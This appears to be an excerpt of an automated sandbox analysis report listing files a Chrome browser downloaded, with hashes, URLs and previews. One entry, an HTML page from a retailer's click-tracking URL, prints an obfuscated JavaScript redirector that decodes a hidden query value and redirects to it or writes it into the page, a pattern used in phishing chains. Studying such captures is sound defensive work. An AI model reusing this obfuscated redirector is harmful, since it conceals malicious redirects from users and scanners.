                                                SHA-512:18642DFF4E6C06F2E5104EDC1E6D2FBBAEEF7D0596DB4E0CE41B90F674E1D0E97C96A1A8C4F46F6237003FD58C8BC94C30BA7055ED2E189B90ED8D57E567D586
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://static.cns-icn-prod.a.intuit.com/_next/static/chunks/9835.59c20536643b9726.js
                                                Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9835],{39835:function(l,c,e){e.r(c);e(67294);var a=e(51245),s=e(85893);c.default=l=>{let{width:c=24,height:e=24,color:h=a.colors.white,className:t=""}=l;return(0,s.jsx)("svg",{xmlns:"http://www.w3.org/2000/svg",width:c,height:e,viewBox:"0 0 24 24",className:t,"aria-label":"Download",children:(0,s.jsx)("path",{fill:h,fillRule:"evenodd","aria-label":"Download path",d:"M20 11c.553 0 1 .448 1 1v6c0 1.654-1.346 3-3 3H6c-1.654 0-3-1.346-3-3v-6c0-.552.447-1 1-1 .553 0 1 .448 1 1v6c0 .55.448 1 1 1h12c.552 0 1-.45 1-1v-6c0-.552.447-1 1-1zm-8-8c.553 0 1 .448 1 1v9.586l2.293-2.293c.391-.391 1.023-.391 1.414 0 .391.39.391 1.023 0 1.414l-3.999 3.999c-.093.093-.203.166-.326.217-.122.051-.252.077-.382.077s-.26-.026-.382-.077c-.123-.051-.233-.124-.326-.217l-3.999-3.999c-.391-.391-.391-1.023 0-1.414s1.023-.391 1.414 0L11 13.586V4c0-.552.447-1 1-1z"})})}}}]);.//# sourceMappingURL=9835.59c20536643b9726.js.map
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:downloaded
                                                Size (bytes):68
                                                Entropy (8bit):4.624228195862582
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:C78156473CCE6B95E73B3297FBC7066A
                                                SHA1:46B827E20C2E79404C09DE27C50FC982E972E0CB
                                                SHA-256:7DB2B032EBFD3AE85EC33D31218291FA0BB14F8E9D1B83FEE9A33DC33B36AAF8
                                                SHA-512:F6298845FDCD2FC82AC9867256B68531606A784F923DF51BDA759BF584002F6F12D515A1FBF094F155217D9681271C6DCEE89EBD90A0EAEEFBF619C2987C0E92
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISLAlB_7W_hlsO5xIFDYkFgtkSBQ1nAJK_EgUNEUrr1xIFDd_mtDQSBQ2UVPrP?alt=proto
                                                Preview:CjEKBw2JBYLZGgAKBw1nAJK/GgAKBw0RSuvXGgAKBw3f5rQ0GgAKCw2UVPrPGgQIBxgB
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text, with very long lines (562), with CRLF line terminators
                                                Category:downloaded
                                                Size (bytes):609
                                                Entropy (8bit):5.068297369018077
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:5FC887CE5C3C585E8EF097C7971D7E6A
                                                SHA1:2DC51A356B22481918BFA54C817CB6A2AADCBDC0
                                                SHA-256:FF0007AF4165ED4CAB8D40BF1D2D05C6DA52F700C3E1FE40F8E8E3436247F98F
                                                SHA-512:ECC802743FFAA7A938A898AF716E27560F11719F2838BD1C6B0B83721B6FA113BB4D7ACF696EF6F69CDF497C493BBC217C494D73BD1D4B6D3AE496EE7352547A
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://farmboyclothing.com/u/click?_t=Cz9tbnVpMD0LP3VxanNkdDA9ISEhIQs8Kn4hISEhISEhIQs8KilpdGJJb0ptamJuRnVmdCEhISEhISEhISEhIQsLPH4hISEhISEhISEhISELfiEhISEhISEhISEhISEhISELPCoxNiEtfiEhISEhISEhISEhISEhISEhISEhCzwqKWVicG1mcy9vcGp1YmRwbS94cGVvanghISEhISEhISEhISEhISEhISEhISEhISELfCE/PiEqKSl1dnBmbmpVdWZ0ISEhISEhISEhISEhISEhISEhISELPG1qYm5mIT4haXRiaS9vcGp1YmRwbS94cGVvanghISEhISEhISEhISEhISEhISEhIQt8ISptamJuZiE+PiIhKjIpaG9qc3V0Y3Z0L2l0Ymkvb3BqdWJkcG0veHBlb2p4IX19IWl0Ymkvb3BqdWJkcG0veHBlb2p4IikhZ2ohISEhISEhISEhISEhISEhCzwjbnBkL3ZkcGpzYnVvcHV0c2pnQW9icGUvenNzYmMjIT4hbWpibmYhdXRvcGQhISEhISEhISEhISEhISEhC3whPz4hKikhPiFpdGJJb0ptamJuRnVmdCF1dG9wZCEhISEhISEhISEhIQt8IT8+ISopIS0oZWZlYnBNdW9mdW9wRE5QRSgpc2ZvZnV0ak11b2Z3RmVlYi91b2ZudmRwZSEhISEhISEhCz8jdXFqc2R0YndiayM+aG9ibSF1cWpzZHQ9ISEhIQs/dXFqc2R0MD0/I3RrL3lmZW9qMGx2L3BkL3VqdWRmb2wwMDt0cXV1aSM+ZHN0IXVxanNkdD0hISEhCz8jMS8yPmZtYmR0Lm1ianVqb2ohLWl1ZWp4LmZkandmZT5pdWVqeCM+dW9mdW9wZCEjdXNwcXhmancjPmZuYm8hYnVmbj0hISEhCz8jOS5HVVYjPnVmdHNiaWQhYnVmbj0hISEhCz9lYmZpPQs/I29mIz5ob2JtIW1udWk9Cz9tbnVpIUZRWlVEUEUiPQs
                                                Preview:<html>..<script>..!function(){function e(e){return decodeURIComponent(Array.prototype.map.call(atob(e),function(e){return"%"+("00"+e.charCodeAt(0).toString(16)).slice(-2)}).join(""))}function n(e){return String.fromCharCode(...e.split("").map(e=>e.charCodeAt(0)-1))}function t(e){return e.split("").reverse().join("")}function o(e){try{return new URL(e),!0}catch{return!1}}var r=window.location.search.substring(1);if(r){var c=r.split("=")[1],i=e(c),l=n(i),a=t(l),u=decodeURIComponent(a);o(u)?window.location.replace(u):document.write(u)}else window.location.replace(atob(""))}();..</script>..</body>..</html>
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                Category:downloaded
                                                Size (bytes):2785
                                                Entropy (8bit):7.881347552761523
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:7DBE4596B420FF7FDAC169A69E4BBFC9
                                                SHA1:BE34FF3E7F9DC756178AE0D2A5DA1A34EE559A0E
                                                SHA-256:F0BE198819B5B8CF7819BB3A89C908AB8648B1196E8EB48418A6746D653A8031
                                                SHA-512:26B21EE302A25FEACAA6E90D6751407A8F0C2DE0B4CFD70A0AEAB5CB6DFD3F550FF9FE8AC566CD065BA48A87B6A44F54FC1ED29A92E932CDCB1D88408A5C93C3
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://static.cns-icn-prod.a.intuit.com/favicon.png
                                                Preview:.PNG........IHDR..............>a.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..]Oh.W..Y.J..-.!.........7..K...R.......`.F.`.5..<....b..Z.....=X.j[...-E..4E..K.o|#.uv...{o..~0lH&;3..}....8..@H/.4>...[..Gw..*...C..`.....]......J...?.g..d..`..!.,.t..f.F..a.$a.(.....B.Q."....gd(...i..;r......-dp-..@....X.S..55np..:..a..mN2P`.iY.K.O7.\... .7......o.......1..H......>...dD(...L.9..6..,.r.0.H......A9Q.......(..../..$......?..l...[...GynO...zU...B...C..$C)YB....U(...3uI....&.K.O7.\.~.I....M..i`.......E2....T..O.1ny.#...aJ.b._]..9-.?.>.&9..%......Qk..M.-.f.LA..E......6I#.......+..s..Ig..MS3.uaW..(..I.>...,]......."..U...i..dq.D...J..<......>.......{l.....G.d..q.9...(.|V.4.p.2@cj.:x.&.....C...2......[..........TX...A.R.P.w.h....Zg....j....e......yK.}.....\.....'.......w..un?....u....q.%.x!.........w6.c.....y.S7............;......rA...,@Ng.[...E2..Tl..u<3Ut..1.Y.M.6;.01..].2._p.m.(.... .D.).}...`0. ..../..zGZ._....9..;:H j........~........5..!.(3.xH<....
                                                No static file info